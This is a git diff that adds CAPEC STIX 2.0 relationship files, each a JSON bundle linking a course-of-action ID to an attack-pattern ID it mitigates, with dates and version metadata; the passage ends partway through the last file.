/dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0492ba63-8134-4235-a371-e1cf83184a85.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2b3b624c-25a8-4b7e-88b3-a43fcad50276", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json new file mode 100644 index 0000000000000000000000000000000000000000..8b6e3d4da79ea240509dc97f8cff967f4420cf5b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e0a7aa0b-defd-417b-8ca0-d93134feee53", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04ce1f7f-b24d-413f-a857-e285a30a2271", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json new file mode 100644 index 0000000000000000000000000000000000000000..4e72f6083fafbfa70ea0acd1c16e50d6975505da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1822c498-0359-4df3-b7e2-524585629874", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b905638-7933-43ac-ae9f-11ab064839c0", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.6" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json new file mode 100644 index 0000000000000000000000000000000000000000..e3dc2f8b7247b74d1417601ca5365309efc1ac12 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c603f553-e246-4c01-93fe-597f07c2b21e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json new file mode 100644 index 0000000000000000000000000000000000000000..175926b8ef335f7a025746134fcabf1122889917 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--46ba069d-4ced-43b4-8206-d12bfa89ccd6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json new file mode 100644 index 0000000000000000000000000000000000000000..103b03dae93888f0415cdd418600e2f8cc6758c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1cd1c784-2746-4ecf-99fa-327169f857ae", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8253e0c6-cd27-455b-9c00-4ef29aa759d2", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json new file mode 100644 index 0000000000000000000000000000000000000000..88405ef4bfaea0b8bfe14c929940cea7aa85b8b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--13105917-4d76-4901-8933-2d812b701fc7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--059701ef-8061-47b4-a433-8f83fe7a16ae", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82858217-6c8b-48b3-950e-5d75c257b76d", + "target_ref": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json new file mode 100644 index 0000000000000000000000000000000000000000..a1354f6bb68d0218206d4940af8704410e1b8328 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--237a72d7-103e-4963-9b4e-2f5244840720", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..89f44ddd9691e03738824f9ea7d7c8293a920402 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7dfb1188-2a9b-4477-adc9-29d929a0ac3a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json new file mode 100644 index 0000000000000000000000000000000000000000..56169993e32502c45f1dddc63647203dee3becf5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2e9b3730-8e44-4e70-83e2-b44393daddb5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json new file mode 100644 index 0000000000000000000000000000000000000000..c6af902d66cf50a8d3713d360e523276d1fb01f5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--58d5d4bf-6f64-4764-a5f3-6f60452c5bde", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json new file mode 100644 index 0000000000000000000000000000000000000000..b83e4146b2afa2b720f490be6f4e2d092b1f86ea --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b9ce15db-7fd9-4617-8dac-40741c2d7866", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json new file mode 100644 index 0000000000000000000000000000000000000000..48e181d25f41c4ebdf74e282e299ab45a3c954f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--59adccc8-15a9-4100-9322-ffa48a3d3e03", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0661cc78-7fa4-41ac-acaa-c68639e51727", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json new file mode 100644 index 0000000000000000000000000000000000000000..48fbed9c38380cccdb897cbef6456d545f02b132 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2d1afad0-8dc6-4cc5-883e-4a716b5bf4a7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json new file mode 100644 index 0000000000000000000000000000000000000000..6faa4edd27155e2caf3c74c8a8659ba06c631146 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fffa52c6-a913-41db-881a-d93e93c4d5e2", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..a6f8632f3a93d83619964faa53dbc55a5223bf89 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e21830d9-8835-4a5f-a66a-6d67b8bf45a7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json new file mode 100644 index 0000000000000000000000000000000000000000..599d6bd064064cd2daa329415a9798ca73a5e2a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--58acd68a-17c7-4450-91bc-256fbbf3028a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json new file mode 100644 index 0000000000000000000000000000000000000000..5aa57293f0143dda17194a60e77fb5d51cf013b8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--def61398-8597-488e-817f-ed8c93e8121f", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json new file mode 100644 index 0000000000000000000000000000000000000000..38d0bf641526b6a2e7e7ca51bad42c5c7d489f47 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ff2083ef-a43e-4ee9-8810-d2b816b2d799", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json new file mode 100644 index 0000000000000000000000000000000000000000..58315c04db2daa82d5eb195a8a47f9126a3e35da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cc5cfcc8-ca34-47e1-96e4-ff22a7893d6d", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json new file mode 100644 index 0000000000000000000000000000000000000000..30d901c81a5ba7ffd224f1eb7d28be8504fb1bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--43426a3b-770e-4b87-abd0-19e92e5334cb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json new file mode 100644 index 0000000000000000000000000000000000000000..9a38d52cb9d132fed82e56d89ec5f2becce8a826 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0c039783-fa23-4ab5-afb1-a732eef0777a", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json new file mode 100644 index 0000000000000000000000000000000000000000..3e37edf06263ba82b1f50a493327f1cee0ca0fbc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--577cf313-2522-4045-b81a-64bb7621c382", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--089719e2-cc34-4f35-8302-12fd80decb91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json new file mode 100644 index 0000000000000000000000000000000000000000..75678d7bb2cfc9aa0e688ea4afbe6e06c82a09ac --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fa2d5514-52d3-4392-a035-453f67b24b7f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 